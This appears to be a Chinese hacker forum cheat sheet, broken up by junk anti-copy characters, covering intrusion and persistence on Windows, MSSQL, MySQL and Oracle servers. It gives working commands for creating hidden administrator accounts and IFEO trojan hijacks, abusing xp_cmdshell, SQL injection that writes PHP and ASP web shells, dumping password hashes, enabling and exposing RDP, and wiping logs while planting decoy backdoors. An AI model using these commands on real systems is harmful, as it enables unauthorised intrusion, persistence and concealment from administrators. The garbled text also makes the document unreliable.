& j( L( P5 {" w0 |1 j$ U5 q1.net user administrator /passwordreq:no/ W: e' r3 r9 X5 {( i9 ?
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
3 s a9 g% S! B2.比较巧妙的建克隆号的步骤; ?! z/ r3 v) i. v Y7 }
先建一个user的用户' Q4 z# j/ v6 V W5 z0 f
然后导出注册表。然后在计算机管理里删掉# i7 s7 k5 E! q
在导入,在添加为管理员组* P2 L r% Q1 `" ?! w" V
3.查radmin密码
6 ~8 k; T! n7 J& w: i0 |0 breg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
/ u! o4 M8 C" v, O6 J+ s4 R4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options] v8 S% F8 q9 v" y9 ] L
建立一个"services.exe"的项
; h {! x! p4 o( m( p再在其下面建立(字符串值)
6 i/ r1 [- H9 F+ Z键值为mu ma的全路径! r1 f K- e/ [/ K
5.runas /user:guest cmd
; ^7 c4 _9 o# I) G; I- \测试用户权限!
) W$ v; F" M9 O8 {6 Z* |& |& f1 v2 [% V6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?; l" \, I5 m( [: W
7.入侵后漏洞修补、痕迹清理,后门置放: L4 E e3 m$ R g
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
' h! B, N) i4 l& K) Q& ?8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c q- U k/ G X: W
4 n9 R+ _" v) P5 ]6 r) yfor example
. o8 V. p' O9 f7 ]8 d& z9 A4 p1 |4 X/ C9 l+ E0 }
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add': q2 B8 Q: U2 m! G/ f/ h2 |
. m" j8 D- j' W+ u+ V
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
4 }) |4 S9 W8 c3 h7 s
& z" }' q, j# J ^1 H8 p9:MSSQL SERVER 2005默认把xpcmdshell 给ON了* ]9 b0 u7 k( V+ t* h4 H
如果要启用的话就必须把他加到高级用户模式; V' L2 \8 M# d5 i
可以直接在注入点那里直接注入
5 b, A* I/ U9 l! aid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
, C9 ^9 ?- F! v! z5 T8 S1 Y0 G然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
/ \1 S& \ @5 \或者
; U0 g" G; j u9 ^8 ?- F ]sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'7 O9 D& Q. |1 M- w# c& j t8 P
来恢复cmdshell。. |' j3 d E+ U; X9 z) Y- r
o2 X% V0 `5 ?$ W2 A( k) J
分析器
3 q3 z9 R) i( ]3 ~0 Y6 N3 u" NEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
8 e% N& j' @: t R然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")7 F7 [/ k; g* c% B# R
10.xp_cmdshell新的恢复办法
$ e7 Z! L) v8 d+ B. txp_cmdshell新的恢复办法
/ D- e& i% e) |扩展储存过程被删除以后可以有很简单的办法恢复:
/ M6 p1 E* h: {+ n; b I4 s/ z删除
3 A# ~) c. X! g4 I) _drop procedure sp_addextendedproc
3 I w) x U) t( Xdrop procedure sp_oacreate
) I. Z+ v( r8 E$ A9 x7 c: Eexec sp_dropextendedproc 'xp_cmdshell'
8 v: e* p% J1 Z( @/ {# b
2 D* O4 m& s7 M. { [恢复( I" s4 w6 E7 D4 m6 N9 ?' Q" S
dbcc addextendedproc ("sp_oacreate","odsole70.dll") V4 M( U. E! v+ C2 }. j" y) S
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")( X9 E' h# b2 c% ~
5 i/ ]0 l- U+ i1 I, w* d( N这样可以直接恢复,不用去管sp_addextendedproc是不是存在/ A% A+ f2 S3 C, R- ?. c9 l
! A& ~7 O0 k# O
-----------------------------0 j1 k- b1 ^) w+ b/ |4 m
3 |. f. ] o7 R& P: P Z" t删除扩展存储过过程xp_cmdshell的语句:! h* O8 w- D' H
exec sp_dropextendedproc 'xp_cmdshell'
& Y" v# J: S9 C$ Q
, \& r" Y; W: N; i$ l& n恢复cmdshell的sql语句: v `- p, a- {0 d' e9 T$ _ v
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
* [! M2 w& A) D, w B7 c+ A( @
; }4 D. u: {1 M; _5 V- H( @- B9 P$ `9 m( s# a
开启cmdshell的sql语句
# z( A. {' `5 |3 v
! x% } S, a$ j9 n4 Q- \* sexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'7 c( a, m0 Y0 i% I; J
- ^% {0 S' P# _: y6 |' t
判断存储扩展是否存在
5 O9 c0 A# l9 Tselect count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
8 [; e" a, y7 j3 Y返回结果为1就ok3 P& k3 A% x& D$ U0 v) Q, {9 ?* U
- l" N3 B$ Y. L/ s6 B' X
恢复xp_cmdshell
+ v9 R. R- I7 G" n+ c* J' oexec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
, {9 T5 _; u- B/ H/ K% A4 A v返回结果为1就ok
- s: Y/ k, J# k1 L1 L5 ?
" V/ u" Q6 w) o$ }否则上传xplog7.0.dll4 m( ?, [8 q& g
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'; L" Y0 U1 ]) b8 u% B! ~4 I3 p
# f+ q7 Y$ ]: n5 P: }堵上cmdshell的sql语句
+ O2 \4 u, }9 gsp_dropextendedproc "xp_cmdshel
) N9 G0 w0 N! o5 d% k+ F-------------------------8 C1 ]# r2 d3 b+ F- ?
清除3389的登录记录用一条系统自带的命令:
3 f* U5 c' T! |7 F7 B# q$ Rreg delete "hkcu\Software\Microsoft\Terminal Server Client" /f
+ m. M3 n6 a3 k' T( x7 n: n" `. w: a; `. v! @ q: }+ u
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
i9 B5 a% ?; g8 }# F q在 mysql里查看当前用户的权限8 q( p1 h* n6 R2 b7 H
show grants for ; w; P# ^* j3 Y* Q
& y8 K3 o4 w# d. g7 ]
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
8 y+ b6 E0 Y" p$ w# v6 n
( O& `/ |9 W. h& I: e6 M+ @6 U; h7 r9 ^$ R; ~* O7 _" J+ a5 G
Create USER 'itpro'@'%' IDENTIFIED BY '123';
. v q" Z U+ l- z8 c+ G, {2 M& i( [ _5 z
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
8 }$ ~( n6 [* l; K U! E8 P+ p+ {; |0 q' Y
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
1 s+ B- f( s2 n) I% r! ~; v: t! s4 n# W# B6 b: S, q
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;7 ~ T9 u$ S$ j" n3 p( r; k6 F0 r
$ d1 x7 O: E5 I6 B& W9 ]
搞完事记得删除脚印哟。6 r0 w1 \; }8 ? k
0 X [$ N( i' u/ U% b
Drop USER 'itpro'@'%';
& o$ s/ v. p% Q+ M5 S% t1 P+ m2 E3 E
1 d2 d. Y n, ~( w% y7 W$ L& [Drop DATABASE IF EXISTS `itpro` ;
, j% L. f8 U) @- ?- L) N$ G4 A3 ?
3 C* L' n; D7 {+ @* B当前用户获取system权限1 p$ c' S. C$ p3 ^
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact. b1 v% |: \! f. h- u$ u
sc start SuperCMD+ v. k/ s: Q7 |# e% t4 T
程序代码' }2 a! G j/ b3 }8 C/ T
<SCRIPT LANGUAGE="VBScript">
& ?! ~& e) `% Z/ ?% @* D5 R( tset wsnetwork=CreateObject("WSCRIPT.NETWORK")
; \) c' A5 f' t4 I' W5 @os="WinNT://"&wsnetwork.ComputerName
$ S/ e0 r. u/ B* s& _Set ob=GetObject(os)9 x2 ?% t7 j3 {* d
Set oe=GetObject(os&"/Administrators,group")! D4 V* b" W" ^' H4 A C
Set od=ob.Create("user","nosec")
( [6 ~' r3 F4 }2 C6 e' uod.SetPassword "123456abc!@#"
: _& h+ C/ S. M1 y( Uod.SetInfo
+ b- t1 n; f9 YSet of=GetObject(os&"/nosec",user)/ u0 r6 N* ^ M( |4 B& L
oe.add os&"/nosec") _# ]. B1 d, V4 w: s3 T4 O. l
</Script>
2 u# {" t @9 v+ w3 Y+ o5 \<script language=javascript>window.close();</script># W+ @5 t: o: b# k% d/ V
7 l, J2 i/ @& A* d% G
: T4 M( D: K8 I6 K2 d" `* e0 }9 N( r/ k) U" J
* m' o! v# m+ m# I3 r
突破验证码限制入后台拿shell/ \0 b. R# k( w1 Z" F7 o1 O% }
程序代码. x: R2 U% [& S/ K& Y; O$ J" ?8 |
REGEDIT4 ) `, }2 _+ _! j% z
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] % h! [* g0 i- [, C7 s' R
"BlockXBM"=dword:00000000
# F: p6 X$ q& w1 v, @
r6 A( V. h% B9 _' ~保存为code.reg,导入注册表,重器IE
3 p2 a* V' C) A5 J% f! ~就可以了
1 a. i2 }6 m V' k+ _7 F `union写马
# x* t7 Q% p' f% `& |" Y6 k9 T9 \程序代码
; \9 P$ m4 j4 Q3 n( n9 b6 Ewww.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
) d; q5 N* |+ Y' q4 F0 p
* T% l- [; c; }5 @, ] o- f应用在dedecms注射漏洞上,无后台写马5 b: Z( f' M) X& W6 b/ |, k8 B
dedecms后台,无文件管理器,没有outfile权限的时候
' t: M( x: {) p% G% |# H) P2 `在插件管理-病毒扫描里9 j! n. G* R3 G% R- x
写一句话进include/config_hand.php里. Q2 H8 \2 _3 }; W* X4 @
程序代码9 u5 Z2 s5 e; y( Y
>';?><?php @eval($_POST[cmd]);?>$ Y1 }7 j2 `& J3 w# D% U) f
" P; [1 X0 A% P/ w- z$ H/ k+ ^
6 R& | q9 w+ w7 H如上格式1 T# h3 x3 X! T& A) N
- \3 n' q) S( Boracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解1 @* F9 i4 [3 x0 S W" u
程序代码& _# y# l: o4 S3 H+ f, ?
select username,password from dba_users;5 o ?7 O- d: j- \8 L% X: x
$ n) v$ s8 ]* L. N9 Q6 ]! k1 z' J* a* r
mysql远程连接用户
% R+ K( d" |+ _7 s0 j( b+ E9 y程序代码
% ^9 ^3 X& r' F5 N- L7 @9 @& [
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';8 W5 Q# T' t7 W8 l8 Y
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION& @2 e' T+ t- s5 O5 H( w) M
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 04 y; U+ @% w$ ^3 N
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
C x: g" p8 t. @: M
$ ]( |9 A$ \# S3 K" W
/ I+ C3 r# H( d; m* A3 N) o8 N7 P" l) N' j1 P6 _6 ~0 }- t
- R7 x3 G! Y% r- W4 J; m0 C/ i, B5 m4 uecho y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
9 Y1 M, g9 m* |& K% V7 i0 o4 M; _) g
1.查询终端端口; m( j. L* }2 e8 u6 N* j% c
$ [2 o; D9 V# A( L* s
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
: g+ Y) d. S. ~# @, v3 k& V
) T+ u; Q; J3 O4 r- s# v6 D通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
! n$ Z5 Q- q3 u8 ], Ptype tsp.reg# b4 D! }# v& n; l ~( Z+ `
r8 v0 k5 O; _2.开启XP&2003终端服务
; o- v* l; n4 L# m# u
; g7 d! M$ X4 _1 Q# w# ?3 i9 R8 a7 c% M* m- M
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f* J. F0 c0 E! t0 Z, M' b1 p4 h
/ q* ~' Q/ d7 l' q E
: H3 z$ C8 V& R; S4 ~" h
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f& V6 ?/ v' N. r6 U" `3 t
/ x* q0 y- q k* E/ @6 l
3.更改终端端口为20008(0x4E28)1 l$ N% C0 ]! Y) J
' O! Y" N$ l2 R, b7 Z' QREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
" X$ L6 |5 }" r; }# f# j( N* k
' A+ T4 T" f( w. m0 FREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
/ m- i( f0 N w, K' k W) Y1 d( \
! D' G( e) _# @6 B9 e) _( l9 }4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
7 f% o' ^+ e* B( i* K9 d& U9 [: s4 f. K3 O. m9 m- ?
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f- ?$ y" F* c, ^
$ |5 i. A1 L- w8 [' Y O1 \. N0 j) F% h/ i s
5.开启Win2000的终端,端口为3389(需重启)
* V8 {) Q; s5 P2 I4 C9 C$ {, i
, S& t# x2 C% P* `9 ~echo Windows Registry Editor Version 5.00 >2000.reg + W2 W/ [8 z. Y6 [5 X+ ]. n+ m" l$ n8 U
echo. >>2000.reg
+ J8 [& P2 B; x% o) |3 w9 lecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
) ]9 o- P1 e( A: S/ a( V9 @) m+ mecho "Enabled"="0" >>2000.reg
9 }- r8 K+ b, h* z3 Oecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
; `# ^/ _' M- Z, w3 s( `; Mecho "ShutdownWithoutLogon"="0" >>2000.reg
; t; C$ l% Z! \: k' z# Cecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg 5 O$ x9 }, ?' r' c# t( W
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg 7 r- a7 O% K2 W. b. z/ X; R
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg s9 f5 v! e, x' F) J1 x
echo "TSEnabled"=dword:00000001 >>2000.reg / d2 Q5 I* L2 ~) G; ~# R
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg 6 W2 O6 l# j4 R4 i/ W- B
echo "Start"=dword:00000002 >>2000.reg
$ |& o; p! `' }6 l# iecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
2 C' Q7 f9 D( y8 Cecho "Start"=dword:00000002 >>2000.reg
! Y! l: X; S7 Qecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
3 b0 Z- ]+ b2 a/ T) w: p/ ~$ o% Cecho "Hotkey"="1" >>2000.reg
: A6 M" }1 Q0 T+ Y6 Cecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg 6 Y+ F q" f9 N+ @5 v5 Q
echo "ortNumber"=dword:00000D3D >>2000.reg 7 f) V; _$ B' N8 C$ Y( d0 b0 c
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg 0 S+ V% J, d/ v% I$ J* J$ _6 }
echo "ortNumber"=dword:00000D3D >>2000.reg3 d+ I: p/ y4 @8 z8 ~
1 _9 W2 m! x8 W$ M8 n: M6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)6 F0 e9 C: B; d
& t) g& h6 p( Y# U@ECHO OFF & cd/d %temp% & echo [version] > restart.inf! A5 O' _% l$ f& P( H& Q0 `" `+ @
(set inf=InstallHinfSection DefaultInstall)9 [9 K3 f+ z8 y! y
echo signature=$chicago$ >> restart.inf
; G! |' k! G% A+ K! decho [defaultinstall] >> restart.inf
" Q, M& ]9 z+ E2 _& orundll32 setupapi,%inf% 1 %temp%\restart.inf
. { W9 t' c* e2 j8 {- J* Q1 ], I
4 ^3 Y& V. n' K4 p' J y
+ G D9 k1 C3 Y) ^1 x2 I0 x" E2 C7.禁用TCP/IP端口筛选 (需重启): }3 t1 l3 f# a, k5 ?
2 J4 B/ F/ u2 ^' M7 W ZREG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
2 B- V( H8 f6 a) ?) Q2 X; Z1 B; Z! K, X3 b/ v' R' v' b* o
8.终端超出最大连接数时可用下面的命令来连接
8 M' R& t2 B+ D/ A5 C
! c/ O3 m$ \: r% vmstsc /v:ip:3389 /console
) E9 p* f5 I2 `/ Z& l& e8 ?$ q
1 ~$ z; D/ n# T8 C! ?9 I+ p9.调整NTFS分区权限: ~0 |) [- e" O8 u" }0 i: N' N6 ?; y
. t2 h1 n7 }3 J7 K7 v- }4 U; Z
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)% I8 k `+ {1 y% i; S7 o5 }
' V: y& |3 f/ B# c; [) L2 c
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
# x- K+ u8 a Y1 P. e5 ?0 ?
; d& W' v5 V+ F* P" r0 q0 R$ n. I------------------------------------------------------) y1 @/ i) k0 t% {7 j
3389.vbs
: p/ C( u1 A/ u/ x, n- {$ @2 [0 QOn Error Resume Next E( |- r! @ J; i/ c$ i B
const HKEY_LOCAL_MACHINE = &H80000002
+ Z& d/ T Q2 ?- G- G/ ^strComputer = "."
e# y' _/ T- p7 XSet StdOut = WScript.StdOut6 f6 c/ |- x2 s
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_+ Q: C1 F! i% g/ T5 k
strComputer & "\root\default:StdRegProv")
/ W @: }) j5 j) n: A: \0 e6 YstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"' C' x3 o3 H5 b# I' `
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
1 E9 j' q/ g; V4 V0 E7 y% r6 WstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
2 @; c: r; o: M9 Zoreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
) @2 D8 \1 e( B6 y$ HstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp". B( B( K- ^% F
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"( ^& v4 t$ E* Y |" N, m
strValueName = "fDenyTSConnections"
9 k* [8 k# b7 Y5 d$ rdwValue = 0
5 ?7 | p3 p' roreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
, c/ w0 D6 O. ^4 y" |+ A+ K0 ystrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"2 B! ~: L6 n. ^; {
strValueName = "ortNumber"
: O- [, u4 a' u% t7 n+ w% b1 GdwValue = 33890 ?1 K: R$ }6 E1 o2 A& {# |
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
# N& I+ j5 z, H8 |0 w$ V. V& A' VstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
1 b5 o9 ]6 V. K3 O9 W# v7 tstrValueName = "ortNumber"
. t9 I9 L& t2 v, T/ X1 S- Y( a$ AdwValue = 3389) G" }9 L7 B' w1 Z5 j
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
+ @) n/ S% a( ^! J$ `4 J4 rSet R = CreateObject("WScript.Shell") 9 f0 N( N/ N7 Z9 F
R.run("Shutdown.exe -f -r -t 0")
! i& ]! D* Z. j( f9 y
; X+ H8 S+ N, l- }; }删除awgina.dll的注册表键值& A# \+ W4 r- T
程序代码
# t8 r6 ^6 }+ B- c' m; [5 R- P; i
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f0 i" Y" w8 @) ^1 o$ p
( c! T; s) ]; q! }- N i8 w7 ^) C- b4 Y3 A! c! Q. a, O( @9 o
$ n6 m7 ^) X4 b$ k, u& e7 o* A, e5 ~+ c6 E" Y+ v8 Z
程序代码
" ]" _0 F' d! a! z2 M1 h9 L0 `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash/ V; r: W; j! z
2 B: d8 w& V B) j
设置为1,关闭LM Hash; l0 i0 }! o$ `; A" n3 ?
, f7 {; T( @( ~5 ^7 w& E3 l8 }6 a数据库安全:入侵Oracle数据库常用操作命令) g& T; \' P, J9 T0 ]! t x @, c
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。
3 h( h& ~; B8 L, c. o) ]1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
/ F7 R, }" |/ Z2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i; p: p% [0 r" L+ A. {& a& ^
3、SQL>connect / as sysdba ;(as sysoper)或
3 |0 j# q* |. yconnect internal/oracle AS SYSDBA ;(scott/tiger)
E# ]; {( |6 iconn sys/change_on_install as sysdba;
, m B' ]* S# t9 y+ h, a: \4、SQL>startup; 启动数据库实例3 ~! E- U# ]. d8 `9 Y
5、查看当前的所有数据库: select * from v$database;
! c) B6 }. Q2 T; e$ v* \5 R0 \select name from v$database; ?2 |0 \% Y, c
6、desc v$databases; 查看数据库结构字段
: J% b3 s- v! `; m) v% t5 F) n! k- y0 ]" a7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:4 o& I/ x9 v. t0 R
SQL>select * from V_$PWFILE_USERS;5 K" K( o! ]/ y
Show user;查看当前数据库连接用户8 m2 s! {1 u" V0 Z/ _0 \
8、进入test数据库:database test;
. ~0 v7 Z. X5 s/ @1 F9、查看所有的数据库实例:select * from v$instance;/ }/ p( X5 V, U; ~' U) X& O
如:ora9i- h; L2 \, e$ h8 c
10、查看当前库的所有数据表:
) O0 t1 K' x6 ~5 V- s8 I& GSQL> select TABLE_NAME from all_tables;
3 q6 {# l4 T2 M- d' M3 i- g H; Mselect * from all_tables;5 }4 [- x7 ^- \7 i( u, V
SQL> select table_name from all_tables where table_name like '%u%';6 C, U$ l7 D I
TABLE_NAME/ ~2 x+ l* H4 r" Y( e
------------------------------- y( q+ L% s4 @, A3 F
_default_auditing_options_
n9 Q' V+ K( m# }! f11、查看表结构:desc all_tables;0 m r+ R3 ]: W+ O+ N
12、显示CQI.T_BBS_XUSER的所有字段结构: v2 m, V C2 T v6 ? G, v
desc CQI.T_BBS_XUSER;$ V8 h/ g3 d2 C* d
13、获得CQI.T_BBS_XUSER表中的记录:) v) c% s' j4 t6 T. O, b
select * from CQI.T_BBS_XUSER;2 A2 p( q6 v# ?% l5 f3 P, J( c
14、增加数据库用户:(test11/test)0 k' o3 E& x4 r! [' I+ m0 B, j$ x
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;1 A1 f- Q: p7 O
15、用户授权:8 R& X5 M3 V% m6 c- L" s
grant connect,resource,dba to test11;
1 C* H5 ]8 f+ H2 n% ]grant sysdba to test11;
/ g5 T* s r* Q3 T8 tcommit;6 J, |$ C$ E& T1 H. @: r
16、更改数据库用户的密码:(将sys与system的密码改为test.)
: E7 S0 R% b/ K% talter user sys indentified by test;. d, i. h1 l% d$ s6 W4 n
alter user system indentified by test;
4 H2 `$ A% ?; V
" j' d4 I: ^. g$ J) H! TapplicationContext-util.xml
! ?! j( _7 i" ` H5 _; yapplicationContext.xml
; x2 ~9 [* w2 k$ _( W1 ?, t. sstruts-config.xml' y ]- m- b+ B! h" t P1 F
web.xml
; U* C* j: r( q. p2 m* Y$ Dserver.xml4 b# n& r. z, R \% j7 }
tomcat-users.xml" Z) q7 t2 W2 ]3 |8 M0 P; D
hibernate.cfg.xml7 H& Q7 T: a+ j1 m2 I6 V! `
database_pool_config.xml
' y. C8 d; u# v- V& N7 v+ l3 }- Y# B; c; y8 L" u/ B. @+ Q9 S: D5 q
- j; d; V& [. P# r\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
6 Z0 d, b9 e" j1 W\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini
0 S1 n# Z7 V$ n3 p\WEB-INF\struts-config.xml 文件目录结构
9 d& N4 Z$ ~8 c. k6 Z: \# m
, z9 y* W5 A( w. M% uspring.properties 里边包含hibernate.cfg.xml的名称4 M7 p# x' i; u* W( I5 B
4 }" f2 n1 h% _! B& K6 x9 {
1 H$ u. g3 Q: |4 E2 E
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml" f( b# j; q$ }/ }1 M
+ ~% T% u* B+ u- Y7 \3 M如果都找不到 那就看看class文件吧。。/ |! g+ t% ?4 g3 Z: F; ?" p
9 X# D' [7 ?, M/ \/ C6 f
测试1:
1 B. }' h `4 H$ O3 OSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
% P! ]7 w1 V5 u* [6 W* e h
, [' S# p- B7 E' J8 }" k1 _9 p测试2:$ K/ ?0 r2 m, E& v, w
% q, C1 m- i* p+ F( Kcreate table dirs(paths varchar(100),paths1 varchar(100), id int)* T7 Q' j7 A* a% X: t1 y
5 @: f# @7 s3 ^0 U
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
' Y. k+ p: l* N; M: ?+ E) U: a4 B0 w/ _! ^
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t19 D; c3 R( ] i6 M I
9 M H1 O6 g& O& E, n) ?+ g
查看虚拟机中的共享文件:. t# b: |) C5 E
在虚拟机中的cmd中执行
& E2 j; f4 e4 U4 k3 m& F7 ^- l4 Z. I\\.host\Shared Folders
4 u: O9 w* Q9 ~# A; m" S# W; ^3 E" i/ d# h: E! ^
cmdshell下找终端的技巧# e0 x( Q5 y8 G# R
找终端:
( I. X. m" o. A. h. [% _: \: B第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
; U7 L$ `8 r2 r6 i 而终端所对应的服务名为:TermService * _% u2 Y1 d% M8 p
第二步:用netstat -ano命令,列出所有端口对应的PID值! & ^- L6 ]# v8 s7 ^5 n5 s
找到PID值所对应的端口, H3 f% z1 r$ }; I/ p, K
5 O" n8 v2 s1 w/ N& g# v
查询sql server 2005中的密码hash
3 d+ S6 ]. C H/ USELECT password_hash FROM sys.sql_logins where name='sa'
! t/ `2 v" e+ w( zSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
8 K1 `" z; W9 S3 }0 S; ?access中导出shell2 \1 Z& p) Q* M- n7 S/ p1 }; C/ p
